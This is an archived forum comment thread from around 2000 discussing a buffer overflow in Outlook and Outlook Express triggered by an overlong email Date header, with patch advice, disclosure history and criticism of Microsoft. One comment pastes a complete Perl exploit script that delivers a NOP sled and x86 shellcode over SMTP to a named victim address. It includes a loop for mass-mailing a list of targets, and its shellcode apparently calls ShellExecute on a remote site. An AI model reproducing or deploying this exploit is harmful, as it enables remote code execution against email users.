The following sentence is true.

/., please... stop whining.

[Otis_INF]

OK, MS should kick out all the office/outlook express developers and hire new ones. But... why do I have to read about an exploit in a MS product on the main page, while there are zillion other exploits in other programs as well but these are NOT mentioned on the front page? I can understand you all can drink Bill Gates' blood for breakfast but please, keep the news informative. If people want to read rants about MS bugs they'll visit zdnet or bugtraq. I don't see why this is nerd/geek or crap that matters' related. It's pure ranting and raving. And after all these years, you still don't understand that whining about the lack of good programming on 'the enemies (enemy? like in a war?) side', doesn't help your own good, it doesn't make your own side's code better.

(the only purpose for this non-informative crapnews I can think of is: it must be a hint for a new conversation at the coffeemachine, when that nice blond from Marketing is at the coffeemachine at the same time as you do :)).

--

Re:/., please... stop whining.

[sien]

It matter because of the huge market share they have. Simple. Mind you you do have a point, if a huge bug in Apache appeared would it make MSNBC ?

Not just an email client bug!

[shad0i]

This is not simply an email client bug, this is an excerpt from Aaron Drew's initial leak of the bug to BUGTRAQ:

The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.

It has bee confirmed that other applications (such as PGP) are vulnerable as well.

--shadoi
"Security == Controlled paranoia."

Re:nothing to do with flexibility

[WowTIP]

Hmmm...

You pretty much described why I use eudora. Because 95% of the world is not using it, it doesn't get the same attention from evil haxxors...

And it's a pretty good client too.

--

"I'm surfin the dead zone

No Win2K Fix

[Acy+James+Stapp]

The great part is that it is impossible for them to fix this in Win2K without issuing a service pack because of the system files protection. Man, microsoft really rocks.

Re:No Win2K Fix

[thechink]

Upgrading to IE 5.01 SP1 will fix the problem on ALL versions of Windows. Upgrading to IE 5.5 however doesn't fix it on W2K. At least so says Microsoft.

Wow.....

[JordoCrouse]

I will never again bad mouth my Netscape 4.72 IMAP client.

-- pause whilst I hug my browser --

So all Microsoft bashing aside, how do things like this get out the door? To me, it almost seems that they are purposely not doing any sort of testing at all. I know about the jokes that say they get free testing by releasing their alphas, but seriously! So many people around the world depend on their software, you would think that they would put it through hell and back, but products continually come out of Redmond with serious, serious flaws.

I mean, how long did it take someone to find a hole in IE 5.5? Like 3 days???
Putting aside all the joke and the "evil empire" comments and everything that the /. community feels about Microsoft, don't you think that a company of that size (and with their software controlling so many critical sites around the globe> has a responsiblity to go overboard on quality assurance? We should be hearing horror stories from ex-employees about 48 hour testing binges and slave driver QA directors. That would make me much more comfortable than the consistant major flaws that keep appearing.

Re:The outlook scripting is for enterprise apps

[CoolVibe]

Oh, I can just whip up a little form in PHP on the departemental webserver and send everyone an URL where the form is.

Geez...

Why would I need scripting in my mail client?

Other news stories on this vulnerability

[nlvp]

These are stolen from the Hacker News Network :

ZDNet Story
MSNBC Story
Information Week Story
CNN Story
SANS Story

Also : Microsoft security bulletin (irony)
Microsoft FAQ + Patch

Re:The outlook scripting is for enterprise apps

[CoolVibe]

Why should I put data on your workstation, if your workstation can get it's data from my central database or my LDAP server? Nice and centralized. *AND* I can change stuff with PHP (PHP has LDAP and support for various databases, including Oracle, Sybase, MSSQL, etc.)

THIS IS WHY SCRIPTING IN CLIENTS IS UNNEEDED

Cheers

Nightmare Scenario

[Militant+Apathy]

Er, couldn't someone use this exploit to initiate a massive DOS attack on an arbitrary target, merely by sending out 10,000 e-mail messages?

And what if lots of shithead kiddies tried this, with lots of targets?

Re:Swiss cheezzz

[skinnymofo]

damn... isn't memory loss a sign of aging?? .

inetcomm.dll

[Stonehand]

OK. So apparently updating IE to a version that provides a newer inetcomm.dll fixes this.

This begs the obvious question -- since it's a DLL, are these (IE, Outlook, Outlook Express) the only ones that use whatever buggy functions allow this exploit? Or might other mail readers be vulnerable?

it affects IE as well

[oliverthered]

I wrote a little virus thingy some time ago(a well behaved one), as a signed activeX controle, the plan was(or wasn't) to seek out and infect web-servers with the virus and propergate it through IE and outlook, excel,word and access are also fun to create viruses for espicially the mutating encripting kind.

Seems like they've just realised this could be a problem. netscape, linux and a box of hankies to cry for those poor m$ bunnies that's what you need.

if windows is a way of life id like to through my life away.

Ummm....

[sulli]

It's the Outlook exploit. So if you don't have Outlook, you probably aren't affected. But you never know, those devious Microsofties just get into everything...

sulli

Re:Bugtraq

[wilkinsm]

Actually, that is an excellent <a href="http://phrack.infonexus.com/search.phtml?vi<nobr>e<wbr></wbr></nobr> w&article=p49-14">link</a>. I understood the technique in principal, but never seen an actually example of how it works. Pretty hairy stuff - the people who play with this must like to crash their own machines often.

secure languages?

[Aardappel]

When are people going to realise that problems like this could never have happened if things were programmed in a secure language (like *cough* Java, or I assume also C# soon) ? How many bugs/crashes/problems are caused by the fact that we insist on continuing to use C/C++?

A little insight

[rips]

I'm the author of the original bugtraq post.

My original post to bugtraq was not intended to happen yesterday. It was through some carelessness on my behalf that it got out (if you really must know, there's a post about it on the bugtraq mailing list).

Both USSR Labs and I found the bug and submitted it to Microsoft independently. Unfortunately, due to my release of the advisory, Microsoft is refusing to acknowledge me in their official credits.

The implications of this bug should be obvious to anyone. Being able to run code on someone else's machine without their input or realization puts this vulnerability some powers above the recent VB script worms by a large factor.

The scariest thing about this problem was that when I discovered it in early June was the amount of time it took to find it. Not long after the ILOVEYOU worm had been spread, my Outlook session crashed. I had this strange urge to look for a way to crash outlook with a corrupted header (call me weird...). 10-15 minutes later I had isolated the problem and 5-8 hours of work after that I had a working exploit for it.

I notified Microsoft in early July about the problem and had been keeping it to myself while they developed patches.

Another thing the media didn't pick up on was that Outlook plugin's such as PGP also seem to crash in the same DLL. I'm not sure what security implications this poses as I haven't looked into this one myself (again further info is on bugtraq) but it highlights the fact that you can't build something secure out of insecure components!

All versions of Outlook are vulnerable

[pen]

All versions of Outlook are vulnerable, including Outlook 97-2000 and Outlook Express 4.0-5.5. Linkety- link (click the different buttons on the top, too).

--

Re:Bugtraq

[Chalst]

Quite so. I should have said: countless remote root exploits, all of which could be used to create worms.

Re:More Microsoft Bashing.. how sad

[neb]

You have got to be kidding me.

Re:Bugtraq

[rips]

Just a quick correction.

Versions of Outlook set up in Corporate/Group mode aren't affected. MS Exchange clients also aren't affected. This bug will only really affect POP3 and IMAP4 mail users.

Macjunkie

[katzman_NJ]

Looks like themacjunkie.com went as far as removing their story but also their whole site. If you go to themacjunkie.com you go to a web hosting company's website instead of theirs. What a wimp, when he's wrong he runs.

The new one is worse

[tilly]

Very, very busy.

I just do not have a site available that does such a good job dissecting it...

Cheers,
Ben

Re:Quick fix for Outlook Express users

[RayChuang]

I think you -better- read that bulletin again.

According this web page:

http://www.microsoft.com/technet/security/bullet in/MS00-043.asp

the bulletin specifically states that if you do a default installation of Internet Explorer 5.01 Service Pack 1 or Internet Explorer 5.5, this will automatically install and/or upgrade to Outlook Express 5.5. Microsoft has specifically stated that OE 5.5 is -not- vulnerable to the issue that USSR Labs discovered. It should be noted that if you are running Windows 2000, you may have to apply the patch (which is now available) or do a manual upgrade to OE 5.5.

more info

[billnapier]

I personally thought the article was lacking in details, so here is the Security Focus bug report that goes into many more details (exploit included).

Re:Quick fix for Outlook Express users

[GodSpiral]

If you read the MS page closer you would have noticed that both 5.01 and 5.5 are vulnerable if you install Outlook Express.

All versions of OE past 4.0 are vulnerable.

nothing to do with flexibility

[kaisyain]

This current exploit has nothing to do with flexibility. I bet if 95% of the world used Eudora, you'd be hearing more about it's buffer overflows.

A New One I Just Found

[Metrol]

This may be old news to some of you, but I just recently discovered this one. Had one of my users bring me his laptop with a variety of problems on it. Had the usual glitches that form up after a while on Win98, but one of them was especially interesting.

His Netscape kept loading up this GoHip web site as it's default home page. Even going into the preferences in NS would only change this until the next re-boot. Had me poking around all over his system trying to figure out how his default home page kept getting changed. I couldn't find anything in the registry or .ini files that looked to be starting up that was out of the ordinary.

I then popped on over to this GoHip web site to have a look. Right on their front page is a link that states something like "Make GoHip your default home page". The clever bit was that this was not a link to some how-to about preferences. It linked directly to a .reg file. This site was able to tweak registry entries directly from the web!

Once I managed to download this .reg file to my local PC I was then able to trace back what all it had changed and get this thing off his system. I knew Windows had some security problems, but I had no idea it was THAT open to an attack.

Now just imagine sending someone an E-Mail with an embedded meta tag that redirected you to some .reg file you've got mirrored on a number of free web hosts. Heck, all I'd have to do at that point is delete the file association to .exe and .com files, which is just two lines of the registry, and I'd have your system rendered useless.

Mind you, I strongly disagree with this monopoly case that is presently going on. The details of this I'll save for later. On the other hand, I would have no problems at all with Microsoft being held criminally liable for gross negligience. None of what I'm talking about here is a secret to Microsoft, and still they continue to put out a known faulty product. How long do you think folks would put up with flaws like this from Ford, Honda, or any other car maker?

outlook just cant be fixed

[wrenling]

And I think its time that MS admitted that. The program is too full of holes, too badly designed, to continue. It should be scrapped, period.

The likelyhood of MS actually admitting the above, let alone following through with my suggestion, is nil. But I think the fact that the hole has been a KNOWN exploit since June 11th and a patch was not made available even a MONTH later is very telling.

Truly, this hole longer than that.. wasnt there a whitepaper about 6 months ago from the authors behind BackOrifice detailing how this kind of exploit was possible?

Re:outlook just cant be fixed

[mizhi]

Yeah. But microsoft thinks that just throwing money at it will be a solution.

A random thought:

If a million microsoft programmers worked at a million workstations would the entire microsoft software library eventually be produced, bug free?

Swiss cheezzz

[skinnymofo]

After reading about all the security holes in Outlook I am forced to ask a rhetorical question: What the f^ck were they thinking???

Bugtraq

[TheTomcat]

Link on securityfocus is here

Also, bugtraq archived here

Now, to avoid everyone calling me a karma whore, here's my insight on the whole thing:

USSR labs decided that they would hold back details until MS produced a fix. Understandable, I mean, they wouldn't want everyone to be developing exploits for the vulnerability while MS sits on it (Yes, I understand that security through obscurity doesn't work, but I'm sure that USSR would've released details if MS had refused to comply in a timely fashion). Anyway, I think that the problem is people actually getting/using the patch.

Sure, sysadmins will probably do corporate work to clear this up, but people do worse jobs maintaining software than they do their cars. At least with cars, they know that the oil needs to be changed every 5000 or so KM, and that when the tread on the tires is bare, those need to be replaced. People are still using IE 3.0! Users generally too lazy to upgrade software, even if there's a known security issue.

That said, I'm as guilty as most of them.

Re:Bugtraq

[z4ce]

The SANS alert does not apply to this exploit... I think Microsoft has outdone themselves on the "the most serious expliot ever" all in the same week. That has to be some kind of record.

Re:Bugtraq

[NetCurl]

Yes, that may be the end result, but I was referring to the reason why the code is able to execute to begin with. No code should be executed upon email download unless the user specifically makes an action to do so.

Re:Bugtraq

[NetCurl]

"Anyway, I think that the problem is people actually getting/using the patch."

I don't thank that is the root of the problem. I think that the problem (considering strictly the Microsoft OS development, not Linux/Unix or anything else) stems from the fact that Microsoft tries to shove too many of these useless active features down the throats of the standard install people who buy their PC from OfficeMax. ActiveX is crap, all the stupid Microsoft proprietary stuff that breeds these security breaches should be curtailed. There shouldn't be huge gaping holes in major packaged components of the Microsoft OS.

If they truly innovate, they shouldn't make these mistakes. This SANS alert goes into more detail about the security hole. Turns out MS's software engineers actually make a series of calls out of order that preempts whatever the user chooses to do. Why does this crap get released?

Actually Eudora is much safer

[PYK]

This flaw is not relegated to Outlook only - any email client which uses the IE engine to display HTML content (Eudora is one such mail client) leaves the door open for this exploit

Two points: If you had read any of this, you would know that the problem is in the transport mechanism of Outlook (the components) - NOT the displaying of the text. Eudora uses its own system for that. Eudora CAN (in the later versions) use the MSIE engine to display message (for the extended HTML parsing), but it doesn't HAVE to do this, its a feature users can set as they please.

Flaw, Bug or marketing ploy?

[Tsujigiri]

Hmmm, I don't know about the rest of you but this seems a little odd to me. A serious flaw in their Email client that requires an upgrade to their latest Web browser to fix.

Could it be that they're using email virus warnings to increase the install base of IE 5.5?

Think about it people!

This email will self destruct in 30 seconds

[dattaway]

Novell's Groupwise has a neat little date field exploit. It doesn't crash or anything, but if you set the date to the distant past, say, the year of 1985, the message will seemingly "self destruct" after it was read and shuffle itself at the old of the mail spool. Its a cool trick if you want a message to disappear after someone reads it. In the spirit of Inspector Gadget (the cartoon, not the stupid movie,) include the quote, "This message will self destruct in 30 seconds."

Anyhow, for more fun, take a look at the source for msnbc's article. It is one HUGE mess of scripting for a short little article. What are they trying to hide in there? Easter eggs? Why all the features for just a damn story?

Re:This email will self destruct in 30 seconds

IF YOU EVER MAKE FUN OF INSPECTOR GADGET THE MOVIE I WILL KICK YOUR ASS.

Re:This email will self destruct in 30 seconds

[jari]

He he. More fun can be had with Netscape Messenger in a similar vein.

If you're on a Windows machine, try setting the clock forward to something like 2100, or "go large" up to 2400 etc. Lots of things break when you do this.

Or set it to something it can handle - like 2021 ;) then send mails. Opposite of self destruct for those filtering on date. Whatever comes in that mail just sits there at front of the queue

Re:More Microsoft Bashing.. how sad

[OnyxRaven]

someone didn't read the whole thing. The major vulnerability is malformed date tags that outlook reads BEFORE the user can even get to them. insanely large numbers in that date field cause a buffer overflow. This is only a userland problem in the way that they are using outlook.

Microsoft trades an advertising bar for security

[aceop]

Yes, for those of us with hotmail accounts through Outlook Express, when you add the patch, what is also included? A blasted advertising bar!!!! I'm really pissed now. ------ Arm thy Pens; Guard thy words; Defend thy Mind

I read this

[josepha48]

It seems that Windows is also suseptable(sp?) to buffer overruns. It is good that they already have fixes for some of the programs, but they need to escalate fixing the problem quickly, before some hacker decides to create another virus. Lets see how long this takes them to get a fix for the rest of there versions. If it is more than a week they are moving to slow. If it is a matter of telling people to upgrade then that is what they should do. Linux and other UNIXes do this all the time.

send flames > /dev/null

Re:It's about time

[dr_eaerth]

Virsuses cannot be contained in image files, sound files, video clips, or other file formats, only executable binaries - still technically true, but thanks to Microsoft's "hide extensions of known types" feature, you can see viruses like "innocent_file.jpg.vbs", which appears in Microsoft clients as "innocent_file.jpg". Launching this file will, of course, trigger the virus.

And we don't even need to hide extensions, because even with extensions set to be visible, .shs (scrap) extensions are hidden. This is a bug which Microsoft has never patched, even though it's been known for at least a year.

Sendmail 8.11 filter to stop this.

[Koos]

I've written a filter for sendmail 8.11 with MAP_REGEX which can stop Date: lines longer then 60 chars. Since I don't think tabs survive /. entry fields, only the URL. Available from http://www.cetis.hvu.nl/~koos/out lookoverflow.txt.

Re:More Microsoft Bashing.. how sad

[Phr3n3tik]

Nope. Nice troll tho'....

THE EXPLOIT IS HERE!

#!/usr/bin/perl
#*********************************************** *******************************
#http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
# Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
#*********************************************** *******************************
#
# By: Ussr Labs
#
# Arbitary shellcode injector over SMTP
# ./$0 -h <server hostname> -m <mail>
# ./dieoutlook.pl -h <smtp server> -m victim@address.com
#
#
#
#For Multiple email's Spanwn do something like this:
#
# for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
#
#
#
#

use Getopt::Std;
use Socket;
getopt('h:m', \%args);

# user defined variables
if(defined($args{h})){$serv=$args{h}}else{&usage ;}
if(defined($args{m})){$rcpt=$args{m}}else{&usage ;}

# These are the escape characters which will cause the seg violation.
# *nix didn't like the ascii interpretation, so we send the
# characters in hex.
# +,1 ,Ì ,^ ,Ð ,z , ,x

$spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\ x78\x0d\x0a";

$shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\ x81\xC4\x00" .
"\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\ x0B\x11\x40\x00" .
"\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\ xEB\x06\x8B\x85" .
"\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\ x42\x11\x40\x00" .
"\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\ x40\x00\x8D\x8D" .
"\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\ x8D\x34\x11\x40" .
"\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\ x11\x40\x00\x8B" .
"\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\ x50\xFF\x95\x0B" .
"\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\ x11\x40\x00\x50" .
"\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\ x00\x6A\x00\x8B" .
"\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\ x00\x00\x00\x5D" .
"\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\ x8D\xB5\x5F\x11" .
"\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\ x00\x61\xC2\x10" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\ xBF\x43\x72\x65" .
"\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\ x65\x6C\x6C\x45" .
"\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\ x6F\x64\x75\x6C" .
"\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\ x6C\x6C\x33\x32" .
"\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\ x72\x62\x61\x63" .
"\x6B\x2E\x63\x6F\x6D\x00";

$ret = "00aedc5a"; # return address
$nop = "\x90"; # x86 NOP
$port = 25; # default 25 SMTP port
$buffsize = "1348"; # buffer size
$buffer .= $nop x 945; # load $buffer with 945 NOP then $shellcode
$buffer .= $shellcode; # append shellcode to buffer
$offset = (hex $ret); # return hex string to corresponding value
$code = pack("N", $offset); # big-endian (long) network order
while (length $buffer < $buffsize) { $buffer .= $code; }
$buffer .= "\n\n";
print "$code\n";

# create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]

$max=(int rand 15);
@a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
@a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
@dom = ('.com', '.net', '.org');
$rdom = $dom[ rand @dom ];
$rmail = $str . "@" . $host . $dom;
print "random address set to: $rmail\n";

# random date method, format: Date: <day>, <int-day> <month> 2000 <time>

@days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
$rday = $days[ rand @days ];
$rcal=(int rand(31));
$rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
$rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
$rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
$rmonth = $months[ rand @months ];
$date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
print "date set to: $date\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(S, $paddr) || die("Error: $!\n");
select(S); $| = 1; select(STDOUT);

# begin our SMTP transaction

print "now starting SMTP transaction\n";
$res=<S>; print "$res\n";
print "sending HELO\n";
system("sleep 2s");
print S "HELO\r\n";
$res=<S>; print "$res\n";

print "sending MAIL FROM\n";
system("sleep 2s");
print S "MAIL FROM:$rmail\r\n";
$res=<S>; print "$res\n";

print "sending RCPT\n";
system("sleep 2s");
print S "RCPT TO:$rcpt\r\n";
$res=<S>; print "$res\n";

print "sending DATA\n";
system("sleep 2s");
print S "DATA\r\n";
$res=<S>; print "$res\n";

print "sending escape characters\n";
print S "$date";
print S " $spawn";

print "sending shellcode\n";
print S "$shellcode\r\n\r\n\r\n";
#$res=<S>; print "$res\n";
print S ".\r\n";
print S "QUIT\r\n";

print "shellcode spawn was successful\n";
close(S);

sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}

Security certification needed?

[gunne]

Ouch!
This is the second time in a week i've been burned (had to do extra work) by security flaws found in Microsoft programs.
I've been thinking about the need for a standards organization, or certification authority, for some time now. The question is; how would you set up such an organization, and would you trust it?
An analogy: All of the major e-commerce sites on the web today buys their SSL certificate from one of the big CA:s, VeriSign for one, because that's a trusted entity.
Wouldn't big progam houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT) My guess is yes. Microsoft, for example, would benefit (at least in large, mission critical installations) from having their source code audited and confirmed by a third party.
When we have open source, most problems are found early (many eyeballs make shallow bugs) but not all. Think of the Wuftpd exploit last month. Is there, perhaps, even a need for an open security auditing organization?

Buffer overflow errors

[Felinoid]

Buffer overflows are normal bugs. Meaning they are very easy to make.
They are also easy to find and fix.

Here is where my gripe starts...
Apple, Sun, Linux etc all can be forgiven if they have an occasional overflow defect. It's pritty normal and they do eventually catch and fix those bugs.

Microsoft unlike the rest lives in a "it works ship it" world. This gripe of course is nowhere near issolated to this one issue.
However this is where it gets more blatent than others.
One programmer could miss this bug and pass it on. Microsoft has people checking code for this sort of thing. If that phase was worth anything this bug would have been cought. However so many other bugs would have been cought as well. But this one is far to easy to catch.
In the end the bug trap phase of MS Windows is worthless.

This dose not prove MsWindows is garbage. It's a normal bug. It can happen to anyone. It proves that the bugtrap phase is really a rubber stamp phase. It says Microsoft has a department purely so they can say they produce better than the open source "many eyes".
But this kind of bug dosn't need many eyes to find and fix. It only needs one pair of eyes.
Microsoft has those eyes... they are closed...

It's a normal bug... it can happen to Linux, MacOS, BSD or Solarus. But it can also be removed. Those who have bug trap dapartments can be reasonably sure such a bug would never see the light of day. Those in the open source can be fairly sure such a bug will have a short life span.

Just publishing a patch isn't going to fix this...

[StevenMaurer]

The problem with real security issues like this one is the number of people who fail to keep up to date on all the latest patches. The infamous Morris worm, for instance, was essentially nothing more than a collection of exploits that had already been published and worked around. It's just that the relatively clueful, but overworked SysAdmins, hadn't installed them yet.

I shudder to think how many clueless MS users will be out there with this vulnerability - even five years from now.

NT BugTraq report

[z4ce]

It is HERE

Funny thing is...

[Kozz]

When installing the IE 5.01 SP 1, the default settings include an option that installs Visual Basic Scripting support...

*scratches head*


Quidquid latine dictum sit, altum viditur.

It's about time

[Grant+Elliott]

Why is this the first internet virus that someone with a brain could actually fall for? Why did it take this long? It seems to me that most virus writters have been bent on having fun without risking a lengthy jail sentence. As a result, we have nothing but these little cheap worms that still cause an incredible ammount of damage. Can you imagine the damage if this thing wormed? And yet, even if this bug actually gets exploited, I doubt it will be malicious. It will probably end up in the advertising method descibed in the article. Cheap thrill.

But at this point in time, one individual could probably bring down the entire internet and then some. Imagine what would happen if someone used this bug to load a CIH-type virus on every computer. Suddenly, the majority of the world's computers go out simultaneously. It'd be mass destruction - and virtually untracable. (Can you imagine what would have happened if someone did this on Jan 1?)

But I don't think any of this will ever happen. I'm sure there will always be a way, but there's no one out there crazy enough to actually do it. Virus writters want cheap thrills. Just becuase the hole is there, doesn't mean anyone will exploit it. We may never see the doomsday virus everyone's worried about for the last decade....

Re:It's about time

[patreides]

"Can you imagine the damage if this thing wormed?"
"...one individual could probably bring down the entire internet and then some."

Now that's what I call natural selection.

Of course since most of the Web Servers run Apache I doubt it would do much damage to the internet itself, just increase bamdwidth on bad email servers, killing them (I imagine that would happen to those running sendmail especially, since it forks itself), and killing people's Windows boxes if they're actually using Outlook. One more reason to use mutt. :-)

Oops

[Robert+Link]

I believe I see now. I had been reading "June 11" as "July 11". An entire month for a patch does seem rather a long time, and certainly out of line with "standard practice".

-rpl

$500 reward

[MousePotato]

I submitted this story yesterday. It was extremely critical of M$ (...well for a cnet story). Here is an article by SANS regarding the problem and a $500 reward for the first person to come up with an automated fix in the form of a virus to innoculate against the security problem. It seems like a novel approach to the problem I wonder if anyone actually figures out how to do this.

What worries me most

[Phil+Eschio]

Is how Microsoft can let their program be so reckless and promiscuous in terms of security. Here we are, with a big, gaping backdoor hole (and not the first one either) in Outlook, and they take an ex post facto attitude to it. Normally I would protest the Slashdot media whore mentality, but when Microsoft seems so lax to the idea of using protection, I feel it is one of the cases where such a mentality is justified.

We can just be fortunate that the wide open hole was discovered prematurely before it could be suddenly torn apart and violated by the efforts of malicious crackers. The possibility that one cracker could use e-mail to forcibly penetrate the hole in Outlook and spread its malicious, destructive seed deep inside a user's computer is absolutely frightening. I only hope word of this giant hole gets out to the public before it can be used and exploited by ill-willed coders.

I am not a great fan of the open source community, but I will say this in their favor. When source code is left wide open to be poked and prodded by thousands of desiring coders, it provides quicker and better stimulation for improvement. Such crawling bugs and gaping holes are rarely discovered out of nowhere in open source software, because of the continual penetration and examination of the source code that occurs in that software paradigm. Hell, we would not have found out about Outlook's newest backdoor entry point in advance unless some benevolent hackers had rammed their way into the hole and pointed it out to Microsoft and the press.


"The most fortunate of persons is he who has the most means to satisfy his vagaries."

M$NB$ has some date flow problems of its own

[dbthomas]

Q: M$NB$ had the story for a month and held on to it? Then they announce the hole before M$ has the patch? Why the fsck didn't they just hold the story for one more day?

A: They held on to the story because M$ in their parent and they fear unemployment more than they fear a shitty journalistic reputation. Holding a story for corporate interests is just as bad as the story two days ago about Forbes expecting a reporter to give up sources' names. I have a feeling M$NB$ was forced to announce the hole a day early because their scoop was being threatened by another news source.

BThomas

The total skinny

[drinkypoo]

This particular vulnerability is kind of amusing. UNIX types have been suffering with buffer overflows for a long time now that have done some nasty things, like giving someone remote root.

In any case, it's pretty lame of M$ to be seeing people fix all their buffer 'sploits on unix-centric applications and then not fix them in an obviously vulnerable location in their own code.

This is especially amusing since they just released that gigantic patch that will ask you before it executes content in an attachment or embedded in a document. They fixed that, but they missed the buffer overflow. All I have to say is HA HA HA. :)

No wait, I have more to say: Mozilla mail ownz j00!

Why did they wait so long to announce it?

[mrogers]

Why did they wait until July 19th to release a fix for a hole discovered on June 11th? Here's why. From the Microsoft security bulletin:

The vulnerability can be eliminated by a default installation of either of the following upgrades:

Internet Explorer 5.01 Service Pack 1.

Internet Explorer 5.5 on any system except Windows 2000

They were waiting for IE5.5 to be released so that they could persuade panicky sysadmins to upgrade to IE5.5. I'm sure many admins place a low priority on upgrading from IE3, IE4 or Netscape, but with this security fix Microsoft can hurry things along a bit. And the more people use a Microsoft browser, the more MS can "embrace and extend" web standards. Their long-term strategy of moving to web-based applications (see the recent announcement of the .NET platform) depends on widespread adoption of browsers which recognise MS extensions.

$ cat < /dev/mouse

The bill to Bill.G from Bill.C

[ukscott]

Dear Bill,

We, at the Government of the United States, have come up with this reasonable figure for the latest wave of damage by your software to the economy of the world. Here is the breakdown:

Number of times windows crashed on me last year (30)

X

Amount of space required for install (600)

X

Ram requirement (32)

X

Confirmed bugs (64,000)

X

Cost of product (200)

X

Number of bad hair days you have had on public TV (400).

This gives a total bill of:

$2,949,120,000,000,000

See you on the links,

President of the United States.

Talk about a sign from God!

[TunaPhish]

I just freshly installed Windows ME RTM on my windows box, and I was considering what e-mail client I should install on it. I thought, well I've used Eudora and Netscape in the past, but I think I'll try and keep this installation using all Microsoft stuff to see what happens . . . Then, I opened up /. to see this article on top.... hmm... maybe I'll stick with Eudora..

Suggestions to Microsoft(tm)

[Hygelac]

I'm no fan of false advertising, and Microsoft(tm) consumers would be a lot better off if Microsoft(tm) would be straight with them. Here are some suggestions on what Microsoft(tm) should change the name of Outlook(R) to:

- Outbreak
- Lookout
- Petrydish

My personal fav is Outbreak. ;-)

Eudora question

[skinnymofo]

DQ: What big security holes are in Eudora? Probably nothing on the level of the Outlook ones.

Conflict of Interest!

[LabWeasel]

Gee, I wonder why MSNBC sat on this information for five weeks before reporting on it at all. Does anyone really think CNN would have gagged itself? Ok, maybe that's not the best example... Still, it does make me wonder.

Re:*yawn* more microsoft bashing

[nnet]

"I would like to see the linux community make a better email program then outlook. We all know it won't happen, the so called linux community is only able to steal ideas"

Better is totally subjective. MS Outlook may be better for you, but not for me, and I venture I'm not the only one that doesn't have to rely on it. But hey, even ACs must be given their right to express themselves.Once a troll, always a troll.

Two step user response:

[dkh2]

1. Stop using MS Outlook!!!!
2. Utilize code for this beast to e-mail as many MS execs as I can identify so I can own them

Not as bad as it might seem

[Dave+The+Magni]

I haven't yet seen a comment that points out a critical factor for this bug:

You need to use Outlook(Express) as your Internet mail client, and not in its "Corporate and Workgroup" mode.

This saves a lot of the hassle for office types running their own mail servers.

See the NTBUGTRAQ article for more details.

million microsoft monkeys

[wrenling]

i think they are already trying that approach. problem is that they have the monkeys convinced that everything MS is good.. therefor there is nothing to fix!

C / C++ etc.

[lonely]

Can all suffer from buffer overruns. Now what you want is a nice bit of Java.

:-)

Sorry couldn't resist.

Quick fix for Outlook Express users

[RayChuang]

If you are running Internet Explorer 4.x, 5.0 and 5.01, the fastest solution to avoid this exploit is to immediately upgrade to at least Internet Explorer 5.01 Service Pack 1.

IE 5.01 SP1 (which avoids the hassles that has plagued some IE 5.5 users) not only has a upgraded browser (which corrects a problem where certain .OCX controls specific to IE can cause memory leak problems) but also incorporates Outlook Express 5.5, which is not vulnerable to the exploit described by USSR Labs.

I believe there will be a fix available on the Windows Update web site that will correct this issue by upgradeing a number of .DLL files--but this is only for IE 4.x and IE 5.0/5.01 users.

Standard practices...

[stefanlasiewski]

"MSNBC.com learned of the flag June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix. That's standard practice in the computer security business in order to prevent possible harm to computer users."

